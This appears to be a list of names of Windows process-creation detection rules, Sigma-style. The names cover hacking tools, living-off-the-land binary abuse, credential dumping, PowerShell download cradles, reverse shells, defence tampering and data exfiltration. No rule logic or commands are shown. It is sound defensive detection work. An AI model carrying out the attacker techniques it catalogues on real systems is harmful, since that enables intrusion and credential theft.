  • Operator Bloopers Cobalt Strike Modules
  • CobaltStrike Load by Rundll32
  • Potential CobaltStrike Process Patterns
  • HackTool - CoercedPotato Execution
  • HackTool - Covenant PowerShell Launcher
  • HackTool - CrackMapExec Execution
  • HackTool - CrackMapExec Execution Patterns
  • HackTool - CrackMapExec Process Patterns
  • HackTool - CrackMapExec PowerShell Obfuscation
  • HackTool - CreateMiniDump Execution
  • HackTool - DInjector PowerShell Cradle Execution
  • HackTool - Dumpert Process Dumper Execution
  • HackTool - EDRSilencer Execution
  • HackTool - Empire PowerShell Launch Parameters
  • HackTool - Empire PowerShell UAC Bypass
  • Hacktool Execution - Imphash
  • HackTool - WinRM Access Via Evil-WinRM
  • Hacktool Execution - PE Metadata
  • HackTool - GMER Rootkit Detector and Remover Execution
  • HackTool - HandleKatz LSASS Dumper Execution
  • HackTool - Hashcat Password Cracker Execution
  • HackTool - Htran/NATBypass Execution
  • HackTool - Hydra Password Bruteforce Execution
  • HackTool - Potential Impacket Lateral Movement Activity
  • HackTool - Impacket Tools Execution
  • HackTool - Impersonate Execution
  • Invoke-Obfuscation COMPRESS OBFUSCATION
  • Invoke-Obfuscation CLIP+ Launcher
  • Invoke-Obfuscation Obfuscated IEX Invocation
  • Invoke-Obfuscation STDIN+ Launcher
  • Invoke-Obfuscation VAR+ Launcher
  • HackTool - Inveigh Execution
  • Invoke-Obfuscation Via Stdin
  • Invoke-Obfuscation Via Use Clip
  • Invoke-Obfuscation Via Use MSHTA
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
  • HackTool - Jlaive In-Memory Assembly Execution
  • HackTool - Koadic Execution
  • HackTool - KrbRelay Execution
  • HackTool - KrbRelayUp Execution
  • HackTool - RemoteKrbRelay Execution
  • HackTool - LaZagne Execution
  • HackTool - LocalPotato Execution
  • Potential Meterpreter/CobaltStrike Activity
  • HackTool - Mimikatz Execution
  • HackTool - PCHunter Execution
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation
  • HackTool - PowerTool Execution
  • HackTool - Pypykatz Credentials Dumping Activity
  • HackTool - PurpleSharp Execution
  • HackTool - Quarks PwDump Execution
  • HackTool - RedMimicry Winnti Playbook Execution
  • Potential SMB Relay Attack Tool Execution
  • HackTool - Rubeus Execution
  • HackTool - SafetyKatz Execution
  • HackTool - SecurityXploded Execution
  • HackTool - PPID Spoofing SelectMyParent Tool Execution
  • HackTool - SharPersist Execution
  • HackTool - SharpEvtMute Execution
  • HackTool - SharpLdapWhoami Execution
  • HackTool - SharpMove Tool Execution
  • HackTool - SharpUp PrivEsc Tool Execution
  • HackTool - SharpView Execution
  • HackTool - SharpWSUS/WSUSpendu Execution
  • HackTool - SharpChisel Execution
  • HackTool - SharpImpersonation Execution
  • HackTool - SharpDPAPI Execution
  • HackTool - SharpLDAPmonitor Execution
  • HackTool - SILENTTRINITY Stager Execution
  • HackTool - Sliver C2 Implant Activity Pattern
  • HackTool - SOAPHound Execution
  • HackTool - Stracciatella Execution
  • HackTool - SysmonEOP Execution
  • HackTool - TruffleSnout Execution
  • HackTool - UACMe Akagi Execution
  • HackTool - Windows Credential Editor (WCE) Execution
  • HackTool - winPEAS Execution
  • HackTool - WinPwn Execution
  • HackTool - Wmiexec Default Powershell Command
  • HackTool - XORDump Execution
  • Suspicious ZipExec Execution
  • Suspicious Execution of Hostname
  • Suspicious HWP Sub Processes
  • Potential Fake Instance Of Hxtsr.EXE Executed
  • Use Icacls to Hide File to Everyone
  • File Download And Execution Via IEExec.EXE
  • Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location
  • Disable Windows IIS HTTP Logging
  • Microsoft IIS Service Account Password Dumped
  • IIS Native-Code Module Command Line Installation
  • Suspicious IIS URL GlobalRules Rewrite Via AppCmd
  • Microsoft IIS Connection Strings Decryption
  • Suspicious IIS Module Registration
  • C# IL Code Compilation Via Ilasm.EXE
  • ImagingDevices Unusual Parent/Child Processes
  • Arbitrary File Download Via IMEWDBLD.EXE
  • InfDefaultInstall.exe .inf Execution
  • File Download Via InstallUtil.EXE
  • Suspicious Execution of InstallUtil Without Log
  • Suspicious Shells Spawn by Java Utility Keytool
  • Suspicious Child Process Of Manage Engine ServiceDesk
  • Java Running with Remote Debugging
  • Suspicious Processes Spawned by Java.EXE
  • Shell Process Spawned by Java.EXE
  • Suspicious SysAidServer Child
  • JScript Compiler Execution
  • Kavremover Dropped Binary LOLBIN Usage
  • Windows Kernel Debugger Execution
  • Computer Password Change Via Ksetup.EXE
  • Potentially Suspicious Child Process of KeyScrambler.exe
  • Active Directory Structure Export Via Ldifde.EXE
  • Logged-On User Password Change Via Ksetup.EXE
  • Import LDAP Data Interchange Format File Via Ldifde.EXE
  • Uncommon Link.EXE Parent Process
  • Rebuild Performance Counter Values Via Lodctr.EXE
  • Suspicious Windows Trace ETW Session Tamper Via Logman.EXE
  • Suspicious CustomShellHost Execution
  • LOLBAS Data Exfiltration by DataSvcUtil.exe
  • Devtoolslauncher.exe Executes Specified Binary
  • DeviceCredentialDeployment Execution
  • Suspicious Diantz Alternate Data Stream Execution
  • Suspicious Diantz Download and Compress Into a CAB File
  • Suspicious Extrac32 Execution
  • Suspicious Extrac32 Alternate Data Stream Execution
  • Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
  • Gpscript Execution
  • Ie4uinit Lolbin Use From Invalid Path
  • Launch-VsDevShell.PS1 Proxy Execution
  • Potential Manage-bde.wsf Abuse To Proxy Execution
  • Mavinject Inject DLL Into Running Process
  • MpiExec Lolbin
  • Execute Files with Msdeploy.exe
  • Execute MSDT Via Answer File
  • Use of OpenConsole
  • OpenWith.exe Executes Specified Binary
  • Use of Pcalua For Execution
  • Indirect Command Execution By Program Compatibility Wizard
  • Execute Pcwrun.EXE To Leverage Follina
  • Code Execution via Pcwutl.dll
  • Execute Code with Pester.bat as Parent
  • Execute Code with Pester.bat
  • PrintBrm ZIP Creation of Extraction
  • Pubprn.vbs Proxy Execution
  • DLL Execution via Rasautou.exe
  • REGISTER_APP.VBS Proxy Execution
  • Use of Remote.exe
  • Replace.exe Usage
  • Lolbin Runexehelper Use As Proxy
  • Suspicious Runscripthelper.exe
  • Use of Scriptrunner.exe
  • Using SettingSyncHost.exe as LOLBin
  • Use Of The SFTP.EXE Binary As A LOLBIN
  • Suspicious Certreq Command to Download
  • Suspicious Driver Install by pnputil.exe
  • Suspicious GrpConv Execution
  • Dumping Process via Sqldumper.exe
  • SyncAppvPublishingServer Execute Arbitrary PowerShell Code
  • SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
  • Potential DLL Injection Or Execution Using Tracker.exe
  • Use of TTDInject.exe
  • Time Travel Debugging Utility Usage
  • Lolbin Unregmp2.exe Use As Proxy
  • UtilityFunctions.ps1 Proxy Dll
  • Use of VisualUiaVerifyNative.exe
  • Visual Basic Command Line Compiler Usage
  • Use of VSIISExeLauncher.exe
  • Use of Wfc.exe
  • Potential Register_App.Vbs LOLScript Abuse
  • Potential Credential Dumping Via LSASS Process Clone
  • Potential Mftrace.EXE Abuse
  • MMC20 Lateral Movement
  • MMC Spawning Windows Shell
  • CodePage Modification Via MODE.COM To Russian Language
  • Potential Suspicious Mofcomp Execution
  • Potential Mpclient.DLL Sideloading Via Defender Binaries
  • File Download Via Windows Defender MpCmpRun.EXE
  • Suspicious Msbuild Execution By Uncommon Parent Process
  • Windows Defender Definition Files Removed
  • Potential Arbitrary Command Execution Using Msdt.EXE
  • Suspicious Cabinet File Execution Via Msdt.EXE
  • Arbitrary File Download Via MSEDGE_PROXY.EXE
  • Suspicious MSDT Parent Process
  • Remotely Hosted HTA File Executed Via Mshta.EXE
  • Wscript Shell Run In CommandLine
  • Suspicious JavaScript Execution Via Mshta.EXE
  • Potential LethalHTA Technique Execution
  • Suspicious MSHTA Child Process
  • MSHTA Suspicious Execution 01
  • Suspicious Mshta.EXE Execution Patterns
  • DllUnregisterServer Function Call Via Msiexec.EXE
  • Suspicious MsiExec Embedding Parent
  • Suspicious Msiexec Execute Arbitrary DLL
  • Msiexec Quiet Installation
  • Suspicious Msiexec Quiet Install From Remote Location
  • Potential MsiExec Masquerading
  • MsiExec Web Install
  • Arbitrary File Download Via MSOHTMED.EXE
  • Arbitrary File Download Via MSPUB.EXE
  • Potential Process Injection Via Msra.EXE
  • Detection of PowerShell Execution via Sqlps.exe
  • SQL Client Tools PowerShell Session Detection
  • Suspicious Child Process Of SQL Server
  • Suspicious Child Process Of Veeam Dabatase
  • Potential MSTSC Shadowing Activity
  • New Remote Desktop Connection Initiated Via Mstsc.EXE
  • Mstsc.EXE Execution With Local RDP File
  • Suspicious Mstsc.EXE Execution With Local RDP File
  • Mstsc.EXE Execution From Uncommon Parent
  • Msxsl.EXE Execution
  • Remote XSL Execution Via Msxsl.EXE
  • New Firewall Rule Added Via Netsh.EXE
  • Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE
  • RDP Connection Allowed Via Netsh.EXE
  • Firewall Rule Deleted Via Netsh.EXE
  • Firewall Disabled via Netsh.EXE
  • Netsh Allow Group Policy on Microsoft Defender Firewall
  • Firewall Configuration Discovery Via Netsh.EXE
  • Firewall Rule Update Via Netsh.EXE
  • Potential Persistence Via Netsh Helper DLL
  • New Network Trace Capture Started Via Netsh.EXE
  • New Port Forwarding Rule Added Via Netsh.EXE
  • RDP Port Forwarding Rule Added Via Netsh.EXE
  • Harvesting Of Wifi Credentials Via Netsh.EXE
  • Suspicious Group And Account Reconnaissance Activity Using Net.EXE
  • Unmount Share Via Net.EXE
  • Start Windows Service Via Net.EXE
  • New User Created Via Net.EXE
  • New User Created Via Net.EXE With Never Expire Option
  • Suspicious Manipulation Of Default Accounts Via Net.EXE
  • Windows Admin Share Mount Via Net.EXE
  • Stop Windows Service Via Net.EXE
  • Password Provided In Command Line Of Net.EXE
  • Windows Internet Hosted WebDav Share Mount Via Net.EXE
  • Windows Share Mount Via Net.EXE
  • System Network Connections Discovery Via Net.EXE
  • Share And Session Enumeration Using Net.EXE
  • Nltest.EXE Execution
  • Potential Arbitrary Code Execution Via Node.EXE
  • Potential Recon Activity Via Nltest.EXE
  • Node Process Executions
  • Network Reconnaissance Activity
  • Nslookup PowerShell Download Cradle - ProcessCreation
  • Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
  • Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
  • Driver/DLL Installation Via Odbcconf.EXE
  • Suspicious Driver/DLL Installation Via Odbcconf.EXE
  • New DLL Registered Via Odbcconf.EXE
  • Odbcconf.EXE Suspicious DLL Location
  • Potentially Suspicious DLL Registered Via Odbcconf.EXE
  • Response File Execution Via Odbcconf.EXE
  • Suspicious Response File Execution Via Odbcconf.EXE
  • Uncommon Child Process Spawned By Odbcconf.EXE
  • Potential Arbitrary File Download Using Office Application
  • Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp
  • Potentially Suspicious Office Document Executed From Trusted Location
  • OneNote.EXE Execution of Malicious Embedded Scripts
  • Suspicious Microsoft OneNote Child Process
  • Outlook EnableUnsafeClientMailRules Setting Enabled
  • Suspicious Execution From Outlook Temporary Folder
  • Suspicious Outlook Child Process
  • Suspicious Remote Child Process From Outlook
  • Suspicious Binary In User Directory Spawned From Office Application
  • Potential Arbitrary DLL Load Using Winword
  • Suspicious Microsoft Office Child Process
  • Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution
  • PDQ Deploy Remote Adminstartion Tool Execution
  • Potentially Suspicious Execution Of PDQDeployRunner
  • Perl Inline Command Execution
  • Php Inline Command Execution
  • Ping Hex IP
  • PktMon.EXE Execution
  • Suspicious Plink Port Forwarding
  • Potential RDP Tunneling Via Plink
  • Suspicious Powercfg Execution To Change Lock Screen Timeout
  • AADInternals PowerShell Cmdlets Execution - ProccessCreation
  • Potential Active Directory Enumeration Using AD Module - ProcCreation
  • Add Windows Capability Via PowerShell Cmdlet
  • Potential AMSI Bypass Via .NET Reflection
  • Potential AMSI Bypass Using NULL Bits
  • Audio Capture via PowerShell
  • Suspicious Encoded PowerShell Command Line
  • Suspicious PowerShell Encoded Command Patterns
  • Suspicious Obfuscated PowerShell Code
  • PowerShell Base64 Encoded FromBase64String Cmdlet
  • Malicious Base64 Encoded PowerShell Keywords in Command Lines
  • PowerShell Base64 Encoded IEX Cmdlet
  • PowerShell Base64 Encoded Invoke Keyword
  • Powershell Base64 Encoded MpPreference Cmdlet
  • PowerShell Base64 Encoded Reflective Assembly Load
  • Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call
  • Potential Process Execution Proxy Via CL_Invocation.ps1
  • PowerShell Base64 Encoded WMI Classes
  • Assembly Loading Via CL_LoadAssembly.ps1
  • Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
  • Potential PowerShell Obfuscation Via Reversed Commands
  • ConvertTo-SecureString Cmdlet Usage Via CommandLine
  • Potential PowerShell Command Line Obfuscation
  • Computer Discovery And Export Via Get-ADComputer Cmdlet
  • New Service Creation Using PowerShell
  • Gzip Archive Decode Via PowerShell
  • PowerShell Execution With Potential Decryption Capabilities
  • Powershell Defender Disable Scan Feature
  • Powershell Defender Exclusion
  • Disable Windows Defender AV Security Monitoring
  • Windows Firewall Disabled via PowerShell
  • Potential PowerShell Downgrade Attack
  • Disabled IE Security Features
  • Potential COM Objects Download Cradles Usage - Process Creation
  • PowerShell Web Download
  • Obfuscated PowerShell OneLiner Execution
  • Potential DLL File Download Via PowerShell Invoke-WebRequest
  • PowerShell Download and Execution Cradles
  • PowerShell Download Pattern
  • Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE
  • DSInternals Suspicious PowerShell Cmdlets
  • Email Exifiltration Via Powershell
  • Potential Suspicious Windows Feature Enabled - ProcCreation
  • Suspicious Execution of Powershell with Base64
  • Potential Encoded PowerShell Patterns In CommandLine
  • Powershell Inline Execution From A File
  • Certificate Exported Via PowerShell
  • Base64 Encoded PowerShell Command Detected
  • Suspicious FromBase64String Usage On Gzip Archive - Process Creation
  • PowerShell Get-Process LSASS
  • Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet
  • PowerShell Get-Clipboard Cmdlet Via CLI
  • Abuse of Service Permissions to Hide Services Via Set-Service
  • Suspicious PowerShell IEX Execution Patterns
  • Root Certificate Installed From Susp Locations
  • Import PowerShell Modules From Suspicious Directories - ProcCreation
  • Unsigned AppX Installation Attempt Using Add-AppxPackage
  • Suspicious PowerShell Invocations - Specific - ProcessCreation
  • Suspicious Invoke-WebRequest Execution With DirectIP
  • Suspicious Invoke-WebRequest Execution
  • Suspicious PowerShell Mailbox Export to Share
  • Malicious PowerShell Commandlets - ProcessCreation
  • MSExchange Transport Agent Installation
  • Non Interactive PowerShell Process Spawned
  • Potential PowerShell Obfuscation Via WCHAR
  • Execution of Powershell Script in Public Folder
  • Tamper Windows Defender Remove-MpPreference
  • RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
  • Potential Powershell ReverseShell Connection
  • Run PowerShell Script from ADS
  • Run PowerShell Script from Redirected Input Stream
  • PowerShell SAM Copy
  • Suspicious Service DACL Modification Via Set-Service Cmdlet
  • Suspicious PowerShell Invocation From Script Engines
  • PowerShell Set-Acl On Windows Folder
  • Change PowerShell Policies to an Insecure Level
  • PowerShell Script Change Permission Via Set-Acl
  • Service StartupType Change Via PowerShell Set-Service
  • Deletion of Volume Shadow Copies via WMI with PowerShell
  • Exchange PowerShell Snap-Ins Usage
  • Stop Windows Service Via PowerShell Stop-Service
  • Suspicious PowerShell Download and Execute Pattern
  • Suspicious PowerShell Parameter Substring
  • Suspicious PowerShell Parent Process
  • PowerShell Script Run in AppData
  • Powershell Token Obfuscation - Process Creation
  • PowerShell DownloadFile
  • User Discovery And Export Via Get-ADUser Cmdlet
  • Net WebClient Casing Anomalies
  • Suspicious X509Enrollment - Process Creation
  • Suspicious XOR Encoded PowerShell Command
  • Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
  • Arbitrary File Download Via PresentationHost.EXE
  • XBAP Execution From Uncommon Locations Via PresentationHost.EXE
  • Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
  • Abusing Print Executable
  • File Download Using ProtocolHandler.exe
  • Suspicious Provlaunch.EXE Child Process
  • Potential Provlaunch.EXE Binary Proxy Execution Abuse
  • Screen Capture Activity Via Psr.EXE
  • PUA - 3Proxy Execution
  • PUA - AdFind Suspicious Execution
  • PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE
  • PUA - AdvancedRun Execution
  • PUA - AdvancedRun Suspicious Execution
  • PUA - Advanced IP Scanner Execution
  • PUA - Advanced Port Scanner Execution
  • PUA - Chisel Tunneling Tool Execution
  • PUA - CleanWipe Execution
  • PUA - Crassus Execution
  • PUA - CsExec Execution
  • PUA - DIT Snapshot Viewer
  • PUA - DefenderCheck Execution
  • PUA - Fast Reverse Proxy (FRP) Execution
  • PUA- IOX Tunneling Tool Execution
  • PUA - Mouse Lock Execution
  • PUA - Netcat Suspicious Execution
  • PUA - SoftPerfect Netscan Execution
  • PUA - Ngrok Execution
  • PUA - Nimgrab Execution
  • PUA - NirCmd Execution
  • PUA - NirCmd Execution As LOCAL SYSTEM
  • PUA - Nmap/Zenmap Execution
  • PUA - NPS Tunneling Tool Execution
  • PUA - NSudo Execution
  • PUA - PingCastle Execution
  • PUA - PingCastle Execution From Potentially Suspicious Parent
  • PUA - Process Hacker Execution
  • PUA - Radmin Viewer Utility Execution
  • PUA - Potential PE Metadata Tamper Using Rcedit
  • PUA - Rclone Execution
  • PUA - RunXCmd Execution
  • PUA - Seatbelt Execution
  • PUA - System Informer Execution
  • PUA - WebBrowserPassView Execution
  • PUA - Wsudo Suspicious Execution
  • PUA - Adidnsdump Execution
  • Python Inline Command Execution
  • Python Spawning Pretty TTY on Windows
  • Potentially Suspicious Usage Of Qemu
  • Query Usage To Exfil Data
  • QuickAssist Execution
  • Rar Usage with Password and Compression Level
  • Files Added To An Archive Using Rar.EXE
  • Suspicious Greedy Compression Using Rar.EXE
  • Suspicious RASdial Activity
  • Process Memory Dump via RdrLeakDiag.EXE
  • Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
  • Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
  • Exports Critical Registry Keys To a File
  • Exports Registry Key To a File
  • Imports Registry Key From a File
  • Imports Registry Key From an ADS
  • Regedit as Trusted Installer
  • Suspicious Registry Modification From ADS Via Regini.EXE
  • Registry Modification Via Regini.EXE
  • DLL Execution Via Register-cimprovider.exe
  • Enumeration for 3rd Party Creds From CLI
  • Suspicious Debugger Registration Cmdline
  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI
  • Potential Persistence Via Logon Scripts - CommandLine
  • Potential Credential Dumping Attempt Using New NetworkProvider - CLI
  • Python Function Execution Security Warning Disabled In Excel
  • Potential Privilege Escalation via Service Permissions Weakness
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution
  • Potential PowerShell Execution Policy Tampering - ProcCreation
  • Hiding User Account Via SpecialAccounts Registry Key - CommandLine
  • Persistence Via TypedPaths - CommandLine
  • Potential Regsvr32 Commandline Flag Anomaly
  • Potentially Suspicious Regsvr32 HTTP IP Pattern
  • Potentially Suspicious Regsvr32 HTTP/FTP Pattern
  • Suspicious Regsvr32 Execution From Remote Share
  • Potentially Suspicious Child Process Of Regsvr32
  • Regsvr32 Execution From Potential Suspicious Location
  • Regsvr32 Execution From Highly Suspicious Location
  • Regsvr32 DLL Execution With Suspicious File Extension
  • Scripting/CommandLine Process Spawned Regsvr32
  • Regsvr32 DLL Execution With Uncommon Extension
  • Potential Persistence Attempt Via Run Keys Using Reg.EXE
  • Add SafeBoot Keys Via Reg Utility
  • Suspicious Reg Add BitLocker
  • Dropping Of Password Filter DLL
  • SafeBoot Registry Key Deleted Via Reg.EXE
  • Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
  • Service Registry Key Deleted Via Reg.EXE
  • Potentially Suspicious Desktop Background Change Using Reg.EXE
  • Direct Autorun Keys Modification
  • Security Service Disabled Via Reg.EXE
  • Dumping of Sensitive Hives Via Reg.EXE
  • Windows Recall Feature Enabled Via Reg.EXE
  • Potential Suspicious Registry File Imported Via Reg.EXE
  • LSA PPL Protection Disabled Via Reg.EXE
  • Modify Group Policy Settings
  • Suspicious Reg Add Open Command
  • Enumeration for Credentials in Registry
  • Enable LM Hash Storage - ProcCreation
  • RestrictedAdminMode Registry Value Tampering - ProcCreation
  • Detected Windows Software Discovery
  • Potential Tampering With RDP Related Registry Keys Via Reg.EXE
  • Potential Configuration And Service Reconnaissance Via Reg.EXE
  • Suspicious ScreenSave Change by Reg.exe
  • Changing Existing Service ImagePath Value Via Reg.EXE
  • Reg Add Suspicious Paths
  • Disabled Volume Snapshots
  • Suspicious Windows Defender Registry Key Tampering Via Reg.EXE
  • Write Protect For Storage Disabled
  • Suspicious Query of MachineGUID
  • Remote Access Tool - AnyDesk Execution
  • Remote Access Tool - AnyDesk Piped Password Via CLI
  • Remote Access Tool - AnyDesk Silent Installation
  • Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate
  • Remote Access Tool - Anydesk Execution From Suspicious Folder
  • Remote Access Tool - RURAT Execution From Unusual Location
  • Remote Access Tool - MeshAgent Command Execution via MeshCentral
  • Remote Access Tool - NetSupport Execution
  • Remote Access Tool - NetSupport Execution From Unusual Location
  • Remote Access Tool - GoToAssist Execution
  • Remote Access Tool - LogMeIn Execution
  • Remote Access Tool - ScreenConnect Execution
  • Remote Access Tool - ScreenConnect Installation Execution
  • Remote Access Tool - ScreenConnect Remote Command Execution
  • Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution
  • Remote Access Tool - ScreenConnect Server Web Shell Execution
  • Remote Access Tool - Simple Help Execution
  • Remote Access Tool - Team Viewer Session Started On Windows Host
  • Remote Access Tool - UltraViewer Execution
  • Discovery of a System Time
  • Renamed AdFind Execution
  • Renamed AutoHotkey.EXE Execution
  • Renamed AutoIt Execution
  • Potential Defense Evasion Via Binary Rename
  • Potential Defense Evasion Via Rename Of Highly Relevant Binaries
  • Renamed BOINC Client Execution
  • Renamed BrowserCore.EXE Execution
  • Renamed Cloudflared.EXE Execution
  • Renamed CreateDump Utility Execution
  • Renamed CURL.EXE Execution
  • Renamed ZOHO Dctask64 Execution
  • Renamed FTP.EXE Execution
  • Renamed Gpg.EXE Execution
  • Renamed Jusched.EXE Execution
  • Renamed Mavinject.EXE Execution
  • Renamed MegaSync Execution
  • Renamed Msdt.EXE Execution
  • Renamed Microsoft Teams Execution
  • Renamed NetSupport RAT Execution
  • Renamed NirCmd.EXE Execution
  • Renamed Office Binary Execution
  • Renamed PAExec Execution
  • Renamed PingCastle Binary Execution
  • Renamed Plink Execution
  • Visual Studio NodejsTools PressAnyKey Renamed Execution
  • Potential Renamed Rundll32 Execution
  • Renamed Remote Utilities RAT (RURAT) Execution
  • Renamed SysInternals DebugView Execution
  • Renamed ProcDump Execution
  • Renamed PsExec Service Execution
  • Renamed Sysinternals Sdelete Execution
  • Renamed Vmnat.exe Execution
  • Renamed Whoami Execution
  • Capture Credentials with Rpcping.exe
  • Ruby Inline Command Execution
  • Potential Rundll32 Execution With DLL Stored In ADS
  • Suspicious Advpack Call Via Rundll32.EXE
  • Suspicious Rundll32 Invoking Inline VBScript
  • Rundll32 InstallScreenSaver Execution
  • Suspicious Key Manager Access
  • Rundll32 Execution Without CommandLine Parameters
  • Mshtml.DLL RunHTMLApplication Suspicious Usage
  • Suspicious NTLM Authentication on the Printer Spooler Service
  • Potential Obfuscated Ordinal Call Via Rundll32
  • Rundll32 Spawned Via Explorer.EXE
  • Process Memory Dump Via Comsvcs.DLL
  • Rundll32 Registered COM Objects
  • Suspicious Process Start Locations
  • Suspicious Rundll32 Setupapi.dll Activity
  • Shell32 DLL Execution in Suspicious Directory
  • Potential ShellDispatch.DLL Functionality Abuse
  • RunDLL32 Spawning Explorer
  • Potentially Suspicious Rundll32 Activity
  • Suspicious Control Panel DLL Load
  • Suspicious Rundll32 Execution With Image Extension
  • Suspicious Usage Of ShellExec_RunDLL
  • Suspicious ShellExec_RunDLL Call Via Ordinal
  • ShimCache Flush
  • Suspicious Rundll32 Activity Invoking Sys File
  • Potentially Suspicious Rundll32.EXE Execution of UDL File
  • Rundll32 Execution With Uncommon DLL Extension
  • Rundll32 UNC Path Execution
  • Suspicious Workstation Locking via Rundll32
  • Suspicious Modification Of Scheduled Tasks
  • Suspicious WebDav Client Execution Via Rundll32.EXE
  • WebDav Client Execution Via Rundll32.EXE
  • Rundll32 Execution Without Parameters
  • Run Once Task Execution as Configured in Registry
  • Suspicious Schtasks Execution AppData Folder
  • Scheduled Task Creation Via Schtasks.EXE
  • Suspicious Scheduled Task Creation Involving Temp Folder
  • Delete Important Scheduled Task
  • Delete All Scheduled Tasks
  • Disable Important Scheduled Task
  • Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
  • Schtasks From Suspicious Folders
  • Suspicious Scheduled Task Name As GUID
  • Uncommon One Time Only Scheduled Task At 00:00
  • Potential Persistence Via Microsoft Compatibility Appraiser
  • Potential Persistence Via Powershell Search Order Hijacking - Task
  • Scheduled Task Executing Payload from Registry
  • Scheduled Task Executing Encoded Payload from Registry
  • Suspicious Schtasks Schedule Types
  • Suspicious Schtasks Schedule Type With High Privileges
  • Suspicious Scheduled Task Creation via Masqueraded XML File
  • Suspicious Command Patterns In Scheduled Task Creation
  • Schtasks Creation Or Modification With SYSTEM Privileges
  • Script Event Consumer Spawning Process
  • Possible Privilege Escalation via Weak Service Permissions
  • New Service Creation Using Sc.EXE
  • Service StartupType Change Via Sc.EXE
  • New Kernel Driver Via SC.EXE
  • Interesting Service Enumeration Via Sc.EXE
  • Allow Service Access Using Security Descriptor Tampering Via Sc.EXE
  • Deny Service Access Using Security Descriptor Tampering Via Sc.EXE
  • Service DACL Abuse To Hide Services Via Sc.EXE
  • Service Security Descriptor Tampering Via Sc.EXE
  • Suspicious Service Path Modification
  • Potential Persistence Attempt Via Existing Service Tampering
  • Stop Windows Service Via Sc.EXE
  • Potential Shim Database Persistence via Sdbinst.EXE
  • Uncommon Extension Shim Database Installation Via Sdbinst.EXE
  • Sdclt Child Processes
  • Sdiagnhost Calling Suspicious Child Process
  • Potential Suspicious Activity Using SeCEdit
  • Suspicious Serv-U Process Pattern
  • Uncommon Child Process Of Setres.EXE
  • Potential SPN Enumeration Via Setspn.EXE
  • Setup16.EXE Execution With Custom .Lst File
  • Suspicious Execution of Shutdown
  • Suspicious Execution of Shutdown to Log Out
  • Uncommon Sigverif.EXE Child Process
  • Uncommon Child Processes Of SndVol.exe
  • Audio Capture via SoundRecorder
  • Suspicious Splwow64 Without Params
  • Suspicious Spool Service Child Process
  • Veeam Backup Database Suspicious Query
  • VeeamBackup Database Credentials Dump Via Sqlcmd.EXE
  • SQLite Chromium Profile Data DB Access
  • SQLite Firefox Profile Data DB Access
  • Arbitrary File Download Via Squirrel.EXE
  • Process Proxy Execution Via Squirrel.EXE
  • Port Forwarding Activity Via SSH.EXE
  • Program Executed Using Proxy/Local Command Via SSH.EXE
  • Potential RDP Tunneling Via SSH
  • Potential Amazon SSM Agent Hijacking
  • Execution via stordiag.exe
  • Start of NT Virtual DOS Machine
  • Abused Debug Privilege by Arbitrary Parent Processes
  • User Added to Local Administrators Group
  • User Added To Highly Privileged Group
  • User Added to Remote Desktop Users Group
  • Execute From Alternate Data Streams
  • Always Install Elevated Windows Installer
  • Potentially Suspicious Windows App Activity
  • Arbitrary Shell Command Execution Via Settingcontent-Ms
  • Phishing Pattern ISO in Archive
  • Automated Collection Command Prompt
  • Bad Opsec Defaults Sacrificial Processes With Improper Arguments
  • Potential Suspicious Browser Launch From Document Reader Process
  • Potential Browser Data Stealing
  • Suspicious Child Process Created as System
  • Potential Commandline Obfuscation Using Escape Characters
  • Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image
  • Potential Command Line Path Traversal Evasion Attempt
  • Suspicious Copy From or To System Directory
  • Copy From Or To Admin Share Or Sysvol Folder
  • Potential Crypto Mining Activity
  • LOL-Binary Copied From System Directory
  • Potential Data Exfiltration Activity Via CommandLine Tools
  • Raccine Uninstall
  • Suspicious Double Extension File Execution
  • Suspicious Parent Double Extension File Execution
  • Suspicious Download from Office Domain
  • DumpStack.log Defender Evasion
  • Always Install Elevated MSI Spawned Cmd And Powershell
  • Suspicious Electron Application Child Processes
  • Potentially Suspicious Electron Application CommandLine
  • Elevated System Shell Spawned From Uncommon Parent Location
  • Hidden Powershell in Link File Pattern
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3
  • ETW Logging Tamper In .NET Processes Via CommandLine
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4
  • ETW Trace Evasion Activity
  • Suspicious Eventlog Clearing or Configuration Change Activity
  • Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
  • Potentially Suspicious Execution From Parent Process In Public Folder
  • Process Execution From A Potentially Suspicious Folder
  • Suspicious File Characteristics Due to Missing Fields
  • Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
  • Writing Of Malicious Files To The Fonts Folder
  • Potential Homoglyph Attack Using Lookalike Characters
  • Execution Of Non-Existing File
  • Base64 MZ Header In CommandLine
  • Potential WinAPI Calls Via CommandLine
  • Potentially Suspicious JWT Token Search Via CLI
  • Local Accounts Discovery
  • LOLBIN Execution From Abnormal Drive
